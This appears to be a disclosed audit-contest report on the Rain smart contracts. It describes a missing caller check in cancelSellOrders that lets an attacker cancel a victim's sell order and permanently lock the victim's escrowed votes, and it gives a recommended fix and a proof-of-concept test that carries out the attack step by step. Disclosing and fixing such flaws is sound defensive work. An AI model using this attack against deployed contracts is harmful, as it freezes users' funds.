'%3e%3cpath%20d='M12.4997%201.33325C10.39%201.33325%208.32772%201.95884%206.5736%203.13091C4.81947%204.30298%203.4523%205.96888%202.64496%207.91796C1.83763%209.86704%201.62639%2012.0118%202.03797%2014.0809C2.44955%2016.15%203.46545%2018.0506%204.95721%2019.5424C6.44897%2021.0342%208.34959%2022.0501%2010.4187%2022.4616C12.4878%2022.8732%2014.6326%2022.662%2016.5816%2021.8546C18.5307%2021.0473%2020.1966%2019.6801%2021.3687%2017.926C22.5408%2016.1719%2023.1663%2014.1096%2023.1663%2011.9999C23.1663%209.17094%2022.0425%206.45783%2020.0422%204.45745C18.0418%202.45706%2015.3287%201.33325%2012.4997%201.33325ZM12.4997%2021.3333C10.6537%2021.3333%208.84922%2020.7859%207.31436%2019.7603C5.7795%2018.7347%204.58322%2017.2771%203.8768%2015.5716C3.17039%2013.8662%202.98555%2011.9896%203.34568%2010.1791C3.70581%208.36859%204.59473%206.70554%205.90002%205.40025C7.20531%204.09496%208.86835%203.20605%2010.6788%202.84592C12.4893%202.48579%2014.3659%202.67063%2016.0714%203.37704C17.7768%204.08346%2019.2345%205.27974%2020.2601%206.8146C21.2856%208.34945%2021.833%2010.154%2021.833%2011.9999C21.833%2014.4753%2020.8497%2016.8492%2019.0993%2018.5996C17.349%2020.3499%2014.975%2021.3333%2012.4997%2021.3333Z'%20fill='white'/%3e%3cpath%20d='M19.167%208.06667C19.042%207.9425%2018.8731%207.8728%2018.697%207.8728C18.5208%207.8728%2018.3519%207.9425%2018.227%208.06667L10.8269%2015.4333L6.82695%2011.4333C6.70495%2011.3016%206.53562%2011.2237%206.35621%2011.2169C6.1768%2011.21%206.00201%2011.2747%205.87028%2011.3967C5.73856%2011.5187%205.66069%2011.688%205.65382%2011.8674C5.64694%2012.0468%205.71162%2012.2216%205.83362%2012.3533L10.8269%2017.3333L19.167%209.01333C19.2294%208.95136%2019.279%208.87762%2019.3129%208.79638C19.3467%208.71514%2019.3642%208.62801%2019.3642%208.54C19.3642%208.45199%2019.3467%208.36485%2019.3129%208.28361C19.279%208.20237%2019.2294%208.12864%2019.167%208.06667Z'%20fill='white'/%3e%3c/g%3e%3cdefs%3e%3cclipPath%20id='clip0_2790_31187'%3e%3crect%20width='24'%20height='24'%20fill='white'%20transform='translate(0.5)'/%3e%3c/clipPath%3e%3c/defs%3e%3c/svg%3e)
Rain Disclosed Report
Audit report Rain Smart Contract Audit ContestMissing Seller Authenticity Check in cancelSellOrders Allows Vote-Escrow Hijacking and Permanent Fund Freeze
Company
Created date
hidden
hiddenTarget
https://github.com/hackenproof-public/rain-contracts
Vulnerability Details
Vulnerability Details
The cancelSellOrders function, via its internal counterpart _cancelSellOrder, fails to verify that the caller (msg.sender) is the original creator of the sell order being cancelled. This critical omission is compounded by a second flaw: after removing the order, the function incorrectly updates the caller's vote escrow balance (userVotesInEscrow[option][caller]) and active order count, instead of the actual seller's.
This creates a functional asymmetry with the buy-side cancellation logic (_cancelBuyOrder), which correctly validates that the caller is the order's original placer before proceeding with removal and refund. The sell-side logic, by contrast, trusts the caller and misapplies the state changes, allowing any user to cancel another's order and corrupt their escrow accounting.
Impact & Attack Scenario
The vulnerability allows for both permanent fund freezing and griefing attacks that disrupt order book liquidity. An attacker can remove any user's sell order, causing the victim's underlying votes to become permanently locked in escrow and blocking them from ever claiming their winnings.
Attack Scenario:
- Setup: The attacker needs to have at least as many votes in their own sell escrow as the victim's order they intend to cancel. This is required to prevent an arithmetic underflow when the contract incorrectly subtracts the victim's order amount from the attacker's escrow balance. The attacker can achieve this by placing their own legitimate sell order.
- Targeting: The attacker identifies a victim's active sell order. All order details (option, price, ID) are publicly available via the
PlaceSellOrderevent. - Execution: The attacker calls
cancelSellOrderswith the victim's order details. - Immediate Impact:
- The contract removes the victim’s sell order from the order book.
- The contract incorrectly decrements the attacker's
userVotesInEscrowbalance by the amount of the victim's order. - The victim's
userVotesInEscrowbalance remains unchanged (still locked).
- Delayed Impact (Permanent Fund Freeze):
- The victim's order is now gone, so they cannot call
cancelSellOrdersthemselves to release their escrowed votes. - If the victim's option is later chosen as the winner, their attempt to call
claim()will fail and revert, because theclaim()function requiresuserVotesInEscrowto be zero for the winning option. - With no way to release the locked escrow, the victim is permanently blocked from claiming their rightful share of the prize pool.
- The victim's order is now gone, so they cannot call
Recommendation
Enforce caller authenticity in _cancelSellOrder and ensure state updates are applied to the correct user (the order's original seller). This can be achieved by mirroring the robust checks already present in the buy-side cancellation function.
Modify the _cancelSellOrder function as follows:
- Add a requirement to verify that the
calleris thesellerAddress. - Change the state updates for
userActiveSellOrdersanduserVotesInEscrowto apply to thesellerAddress, not thecaller.
function _cancelSellOrder(
uint256 option,
uint256 price,
uint256 orderID,
address caller
) private {
// ... (initial checks remain the same)
LinkedListStorage.LinkedList storage linkedList = sellOrders[option][
price
];
// ...
int256 nodeIndex = orderBook[option][price][orderID].index;
address sellerAddress = LinkedListLogic.getMaker(linkedList, nodeIndex);
uint256 orderAmount = LinkedListLogic.getAmount(linkedList, nodeIndex);
// RECOMMENDED FIX: Add authenticity check
if (caller != sellerAddress) {
_revert(CallerNotOrderPlacer.selector);
}
linkedList.remove(nodeIndex);
orderBook[option][price][orderID].exists = false;
orderBook[option][price][orderID].index = 0;
// RECOMMENDED FIX: Update seller's accounting, not caller's
userActiveSellOrders[sellerAddress]--;
userVotesInEscrow[option][sellerAddress] -= orderAmount;
++ordersRemoved;
emit CancelSellOrder(
option,
orderAmount,
price,
orderID,
sellerAddress
);
}
Validation steps
I create a PoC to prove this issue and how an attacker can DoS and steal freeze evertyhing for an user
function test_PoC_SellCancel_MissingAuthenticity_LocksVictimEscrow() public {
uint256 option = 1;
uint256 tick = rainPool.TICK_SPACING();
uint256 p1 = tick * 5; // 0.05 ether
uint256 p2 = 99 * tick; // 0.99 ether (won't be matched by currentPrice)
// Warp to live sale
vm.warp(rainPool.startTime() + 1);
// Attacker is a random user (not owner) – acquire votes first to avoid matching victim later
address attacker = makeAddr("attacker");
uint256 attackerAmount = 2_000_000; // fund attacker to acquire votes
deal(address(baseToken), attacker, attackerAmount);
vm.startPrank(attacker);
baseToken.approve(address(rainPool), attackerAmount);
rainPool.enterOption(option, attackerAmount);
vm.stopPrank();
// Attacker places sell at p2 and escrows votes
uint256 attackerVotesTotal = rainPool.userVotes(option, attacker);
uint256 attackerVotesToSell = attackerVotesTotal / 5; // ample escrow
if (attackerVotesToSell < 2) attackerVotesToSell = 2;
vm.startPrank(attacker);
uint256 attackerOrderId = rainPool.placeSellOrder(option, p2, attackerVotesToSell);
vm.stopPrank();
(attackerOrderId);
uint256 attackerEscrowBefore = rainPool.userVotesInEscrow(option, attacker);
// Victim acquires votes via market entry AFTER attacker has placed sell, so attacker won't auto-take victim
address victim = addr1;
uint256 victimAmount = 200_000; // base units (0.2 token)
deal(address(baseToken), victim, victimAmount);
vm.startPrank(victim);
baseToken.approve(address(rainPool), victimAmount);
rainPool.enterOption(option, victimAmount);
vm.stopPrank();
// Determine a safe number of votes to list (>=2 to pass internal check) – less than attacker escrow
uint256 victimVotesTotal = rainPool.userVotes(option, victim);
uint256 victimVotesToSell = victimVotesTotal / 4;
if (victimVotesToSell < 2) victimVotesToSell = 2;
if (victimVotesToSell > attackerEscrowBefore) victimVotesToSell = attackerEscrowBefore;
// Victim places a sell order at p1, locking escrow
vm.startPrank(victim);
uint256 victimOrderId = rainPool.placeSellOrder(option, p1, victimVotesToSell);
vm.stopPrank();
assertEq(rainPool.userVotesInEscrow(option, victim), victimVotesToSell, "victim escrow not set");
// Attacker cancels the victim's order (BUG: no authenticity check; escrow/accounting applied to attacker)
uint256[] memory opts = new uint256[](1);
uint256[] memory prices = new uint256[](1);
uint256[] memory ids = new uint256[](1);
opts[0] = option; prices[0] = p1; ids[0] = victimOrderId;
vm.startPrank(attacker);
rainPool.cancelSellOrders(opts, prices, ids);
vm.stopPrank();
// Victim's escrow remains locked; attacker’s escrow decreased instead
assertEq(rainPool.userVotesInEscrow(option, victim), victimVotesToSell, "victim escrow should remain locked");
assertEq(
rainPool.userVotesInEscrow(option, attacker),
attackerEscrowBefore - victimVotesToSell,
"attacker escrow decreased incorrectly"
);
// Victim cannot cancel (order removed), proving irrecoverable state
vm.startPrank(victim);
vm.expectRevert(IRainPool.OrderDoesNotExist.selector);
rainPool.cancelSellOrders(opts, prices, ids);
vm.stopPrank();
// Finalize and set winner = victim's option, then claim should revert due to lingering escrow
vm.warp(rainPool.endTime() + 1);
rainPool.closePool();
vm.prank(resolverPool);
rainPool.chooseWinner(option);
vm.warp(rainPool.endTime() + 61 minutes);
vm.startPrank(victim);
vm.expectRevert(IRainPool.UserSellOrderExist.selector);
rainPool.claim();
vm.stopPrank();
}
Attachments
hidden CommentsReport History
Comments on this report are hidden 
Details Statehidden
hiddenSeverity Critical
Bounty$0
Visibilitypartially
VulnerabilityOther
Participants hidden